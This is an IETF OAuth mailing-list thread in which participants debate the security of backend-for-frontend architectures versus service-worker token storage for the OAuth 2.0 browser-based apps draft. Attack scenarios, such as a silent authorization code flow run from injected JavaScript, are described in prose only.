You can write your code as strong as you wish. You cannot determine if the
code running in the computer is that code running unaltered. ..tom


On Sun, Aug 27, 2023 at 5:25 AM Yannick Majoros <yann...@valuya.be> wrote:

> Thanks for taking the time to respond and for the constructive feedback.
>
> Still, there is some initial incorrect point that makes the rest of the
> discussion complicated, and partly wrong.
>
> Specifically, §6.4.2.1 says this: *The service worker MUST NOT transmit
> tokens, authorization codes or PKCE code verifier to the frontend
> application.*
>
> Wording should be refined, but the idea is that the service worker is
> to actually restrict authorization codes from even reaching the frontend.
> Of course, easier said than done, but that part happens to be quite easy to
> implement.
>
> This has further impact on much of the other statements:
> *> The main problem with a browser-only client is that the attacker with
> control over the client has the ability to run a silent Authorization Code
> flow, which provides them with an independent set of tokens*
> [...]
> *> **The security differences between a BFF and a browser-only app are
> not about token storage, but about the attacker being able to run a new
> flow to obtain tokens.*
> [...]
> *> Again, the security benefits of a BFF are not about stoken storage.
> Even if you find the perfect storage solution for non-extractable tokens in
> the browser, an attacker still controls the client application and can
> simply request a new set of tokens. *
>
> Truth is: no, you can't start a new authentication flow and get the
> authorization code back in the main thread. I'm talking about the
> redirection scenario, which I'm the most familiar with, but it would
> probably apply to the "message" one as well (which is new to me and seems
> to be ashtoningly legit due to vague "for example" wording in the OAuth2
> spec :-) ).
>
> The service worker, according to
> https://developer.mozilla.org/en-US/docs/Web/API/ServiceWorkerGlobalScope/fetch_event#description
> , just intercepts the authorization code, gets a token, and never sends it
> back to the main code.
>
> But don't trust me on my words: what about demonstrating our claims with
> actual code, and as such create a shorter, simpler, but more constructive
> discussion?
>
> The demonstration in its current form would not lead to a successful
> compromise of a good implementation of access tokens handled by a service
> worker.
>
> Yannick
>
>
> Le sam. 26 août 2023 à 14:20, Philippe De Ryck <
> phili...@pragmaticwebsecurity.com> a écrit :
>
>> My responses inline.
>>
>>
>> Hi everyone,
>>
>> The document is about "OAuth 2.0 for Browser-Based Apps". Its abstract
>> further explains that it "details the security considerations and best
>> practices that must be taken into account when developing browser-based
>> applications that use OAuth 2.0.".
>>
>> As such, detailing security considerations is important. I share the
>> point of view that basing web applications on proven concepts is important.
>> The approaches detailed in the document have all their advantages
>> and disadvantages.
>>
>>
>> We have discussed the topic of browser-based apps in depth at the OAuth
>> Security Workshop last week. I am also working with Aaron Parecki on
>> updating the specification to more accurately reflect these advantages and
>> disadvantages. Updates will go out in the coming days/weeks, so we more
>> than welcome concrete feedback on the content there.
>>
>> There are 2 main approaches to browser-based applications security. One
>> of them is to store security credentials at the frontend. The other one is
>> to use cookies and a BFF. Though common practice, there is nothing
>> fundamentally more secure about them in a demonstrable way. Different
>> approaches, different characteristics and security assumptions. Nobody can
>> prove that either approach is better, just that there are different
>> concerns.
>>
>> Handling security in BFFs relies on cookies that cannot be read by the
>> javascript application. This mechanism provides some reliable protection
>> about the cookie itself that is used as a kind of credential to access
>> confidential web resources. It obviously demands some additional layers in
>> the flow (proxy or light server). You also need a mechanism to share
>> session information, either at the server side, or for example by having
>> the cookie itself hold that information. A bigger concern to me is that you
>> basically give up standard mechanisms for securing the flow between the
>> frontend and the backend: the security between the two is a custom solution
>> (based on cookies, in a specific, custom way, this part being in no way
>> OAuth or standard). This solves the problem by not using OAuth at all in
>> the browser part of the application, basically making the client
>> application purely backend. However, the fact that browser-based
>> applications cannot be secured with OAuth isn't universally true, and
>> strongly depends on one's definition of "secure", and basically comes down
>> to what the security issue is.
>>
>>
>> The updated specification will clearly outline the security
>> considerations when making the browser-based application a public OAuth
>> client.
>>
>> *The main problem with a browser-only client is that the attacker with
>> control over the client has the ability to run a silent Authorization Code
>> flow, which provides them with an independent set of tokens.* These
>> tokens give the attacker long-term and unrestricted access in the name of
>> the user. A BFF-based architecture does not suffer from this issue, since
>> the OAuth client is a confidential client. Regardless of one’s definition
>> of “secure”, this is a clear difference on the achievable level of
>> security.
>>
>> Of course, as stated multiple times before, the use of a BFF does not
>> eliminate the presence of the malicious JS, nor does it solve all abuse
>> scenarios.
>>
>>
>>
>> Storing tokens at the frontend has advantages: it solves my concern above
>> about a standard based flow between the frontend and the backend.
>>
>>
>> The use of cookies is a core building block of the web, and is quite
>> standard.
>>
>> It's simpler from an operational point of view. And it's been used in the
>> wild for ages.
>>
>>
>> Anyone using a browser-only client should be informed about the clear and
>> significant dangers of this approach, which the updated specification will
>> do.
>>
>>
>> Both flows have been compromised numerous times. This doesn't mean they
>> are not right by design, but that the specific security concerns have to be
>> addressed.
>>
>>
>> If you have specific security concerns about a BFF, I’d suggest raising
>> them. Until now, I have only seen arguments that highlight the additional
>> effort it takes to implement a BFF, but nothing to undermine its security.
>> Plenty of highly sensitive applications in the healthcare and financial
>> industry opt for a BFF for its improved security properties and consider
>> this trade-off to be favorable.
>>
>>
>> Now, the concerns we are really discussing is, what happens in case of
>> XSS or any form of malicious javascript.
>>
>> In this case, for all known flows, session riding is the first real
>> issue. Whether the injected code calls protected web resources through the
>> BFF or using the stored tokens, is irrelevant: the evil is done. Seeing
>> different threat levels between token abuse and session riding is a logical
>> shortcut: in many cases, the impact will be exactly the same.
>>
>>
>> Stating that using stolen tokens is the same as sending requests through
>> a compromised client in the user’s browser (client hijacking) is
>> categorically false. Here are two concrete differences:
>>
>>
>>    - Stolen refresh tokens give an attacker long-term access in the name
>>    of the user. Client hijacking only works as long as the user’s browser is
>>    online and the client is effectively running.
>>    - Stolen access tokens give an attacker unfettered access to any
>>    resource server that accepts it. Client hijacking forces the attacker to
>>    play by the rules of the client. For example, an attacker can abuse a
>>    stolen token with fake origin headers to access a resource server that
>>    would accept the token, but has a CORS policy that rejects requests from
>>    the client’s origin
>>
>>
>> As stated before, the DPoP specification takes a similar point of view on
>> these consequences. They explicitly aim to prevent the abuse of stolen
>> tokens, while considering client hijacking to be out of scope (
>> https://datatracker.ietf.org/doc/html/draft-ietf-oauth-dpop#name-objectives
>> )
>>
>>
>> On a sidenote, the term “session riding” seems to refer to CSRF, not to
>> client hijacking. I have only learned this myself recently and have
>> mis-used this term before as well. I wanted to point this out to avoid
>> further confusion.
>>
>>
>>
>> Reducing the attack surface with a BFF or even a simple proxy is a
>> possible but separate topic: this doesn't have to be linked to where tokens
>> are stored. Alternatively, services that shouldn't be accessible could
>> simply not be exposed, and token scope and audience must be well thought.
>>
>> As such, BFFs as well as frontend token storage, though different, are
>> application design choices and have no demonstrable superiority from a
>> security point of view.
>>
>>
>> *The security differences between a BFF and a browser-only app are not
>> about token storage, but about the attacker being able to run a new flow to
>> obtain tokens.*
>>
>> You also talk about “demonstrable” differences. I have shown examples
>> (both in text and video) of these consequences in browser-only apps,
>> resulting in the attacker obtaining both an access token and a refresh
>> token. If you claim that BFFs are just the same, I invite you to
>> demonstrate your point of view.
>>
>>
>> Still, it seems it matters to some people to not exfiltrate tokens in
>> case of successful XSS. In the first instance, I don't share this need to
>> protect short-lived tokens in a game over scenario, but the whole
>> investigation of more secure frontend storage mechanisms started because
>> some customers are concerned. We are in the realm of choice, not of
>> provable security need, but it is still important to them.
>>
>> Documenting security concerns and possible solutions is part of the
>> document. Where you store the tokens has an impact on how easy it will be
>> for an attacker to exfiltrate them. Local or session storage is obviously
>> not the best choice here, as injected javascript can easily access it.
>>
>>
>> Again, the security benefits of a BFF are not about stoken storage. Even
>> if you find the perfect storage solution for non-extractable tokens in the
>> browser, an attacker still controls the client application and can simply
>> request a new set of tokens.
>>
>> This link points to the exact demo scenario in the video I have
>> referenced before: https://youtu.be/OpFN6gmct8c?feature=shared&t=1366 It
>> clearly shows how the attacker runs a new flow to obtain tokens, without
>> ever touching the application’s tokens.
>>
>>
>> A service worker is an interesting place to store them, as it can
>> additionally play the role of a front-end proxy that both holds the token
>> securely, and securely proxy requests to the resource server. Besides, a
>> track was started with Rifaat to initiate changes to the service worker
>> specifications to make some things simpler.
>>
>> The point that the service worker solution isn't that widespread is
>> indeed correct and should be addressed. I propose transparently mentioning
>> that it is seen as a possible but uncommon storage mechanism. There should
>> also be some explanation about other kinds of web workers, which are more
>> commonly used but exploitable, so less secure when token exfiltration is a
>> concern. The document isn't only about security best practices, though, but
>> about security concerns. Implementations are explicitly out of scope.
>>
>>
>> Using a SW for storage does not solve anything, since the attacker can
>> simply request fresh tokens.
>>
>>
>> My conclusion is that, though we can surely make the document better,
>> there is no all-encompassing solution. Similarly, BFFs are not
>> a higher level of security for healthcare of banks, just a different
>> solution. Service workers are still an interesting solution for people who
>> absolutely want to secure tokens at the frontend, and as improvable as
>> the document is, shouldn't be left out.
>>
>>
>> You, as the creator of the SW approach, have clearly stated that you
>> don’t even use it in practice, so I don’t really understand the urge to
>> make this a recommended pattern. On the contrary, BFFs are used in practice
>> in a variety of scenarios.
>>
>> That said, the SW approach should indeed be mentioned in the document, to
>> clearly illustrate the security considerations and limitations.
>>
>>
>>
>>
>> About some specific concerns:
>> > *While content injection attacks are still possible, the BFF limits
>> the attacker’s ability to abuse APIs by constraining access through a
>> well-defined interface to the backend which eliminates the possibility of
>> arbitrary API calls.*
>> Session riding is still the main issue and isn't addressed at all. If the
>> intention here was to limit the number of exposed endpoints, the
>> application can still be designed to either only expose what is needed, or
>> put a proxy or api manager between for limiting exposition, unrelated to
>> where token storage happen.
>>
>>
>> No-one has ever stated that a BFF would solve the consequences of an
>> attacker hijacking a client. However, when the attacker is forced to launch
>> attacks through a client running in the user’s browser, they are forced to
>> go through the BFF. That gives you a point of control which you *could* use
>> to implement restrictions. This is not required to benefit from a BFF,
>> since the main benefit is moving from a public client to a confidential
>> client.
>>
>> You state that you can achieve the same by using a careful design of the
>> application. However, you fail to mention what you consider the
>> “application” and where exactly this restriction fits in. This is
>> important, because once the attacker has exfiltrated access tokens, they
>> can send arbitrary requests. If the resource servers are not fully shielded
>> by an API manager, the attacker can contact them directly with a stolen
>> token. And if you apply this close to the resource servers, how will you
>> then configure them to only allow certain clients to access certain
>> endpoints?
>>
>>
>> *> No, because running a silent flow in an iframe typically uses a web
>> message response. In essence, the callback is not the redirect URI, but a
>> minimal JS page that sends the code to the main application context using
>> the web messaging mechanism. The message will have the origin of the
>> authorization server as a sender. *
>> The iframe needs to get the auth code somehow, and that typically happens
>> by setting its src to the auth endpoint, and having a redirect URI that
>> points to that minimal js page. This would mean an  attacker can change the
>> redirect URI to be able to point to some custom js in the application,
>> which is a whole different
>>
>> Philippe, I'm honestly quite skeptical about that attack, but it sounds
>> interesting. Can you provide some details or a reproducer?
>>
>>
>> In all honesty, my understanding that the Web Messaging approach was
>> universally used turned out to be inaccurate. There are two concrete ways
>> to run a silent authorization code flow: (1) using
>> response_mode=web_message and (2) using the proper redirect URI. Both
>> scenarios allow the attacker to obtain the authorization code by starting
>> the flow with an authorization request that *is indistinguishable* from
>> a request coming from the legitimate application.
>>
>> *Scenario 1 (web messaging)*
>>
>>
>>    - The iframe src points to the authorize endpoint
>>    - The AS does not redirect, but responds with an HTML page containing
>>    JS code. This JS code uses postmessage to send a message containing the
>>    authorization code to the main application context.
>>    - The attacker receives this message and obtains the authorization
>>    code
>>
>>
>> This approach is used by Auth0 and Apple. I have tested my attack
>> scenario against Auth0. Note that while this flow *does not use* the
>> redirect URI, it does validate the provided redirect URI. Additionally, the
>> admin needs to configure the AS to include the client’s origin in a list of
>> “Allowed Web Origins”.
>>
>> This is also the scenario I use in the demo I have linked to above, so
>> you can see it in action there.
>>
>>
>> *Scenario 2 (redirect)*
>>
>>
>>    - The iframe src points to the authorize endpoint
>>    - The AS redirects the frame to the application’s callback with the
>>    authorization code as a query parameter
>>    - The attacker can monitor the iframe for a URL that contains the
>>    authorization code, stop the frame from loading (and redeeming the
>>    authorization code), and extract the code
>>
>>
>> This approach is more universal, but just as vulnerable. The scenario is
>> exactly the same as in the demo linked to above, but the attack code looks
>> slightly different.
>>
>>
>>
>> To conclude, I have carefully argued my point of view on this mailing
>> list, in recorded videos, and in the sessions at the OAuth Security
>> Workshop last week. As far as I can tell, the experts in the community
>> acknowledge the dangers of browser-only apps (i.e., the attacker running a
>> silent flow)  and agree that the browser-based apps BCP should accurately
>> reflect this information. We’re currently working on updating the
>> specification (which will happen in multiple steps, so we ask for a bit of
>> patience).
>>
>> Unless you have anything new to add or any new issues to raise, I
>> respectfully opt to disengage from further discussion.
>>
>> Kind regards
>>
>> Philippe
>>
>>
>
> --
> Yannick Majoros
> Valuya sprl
>
> _______________________________________________
> OAuth mailing list
> OAuth@ietf.org
> https://www.ietf.org/mailman/listinfo/oauth
>
_______________________________________________
OAuth mailing list
OAuth@ietf.org
https://www.ietf.org/mailman/listinfo/oauth

Reply via email to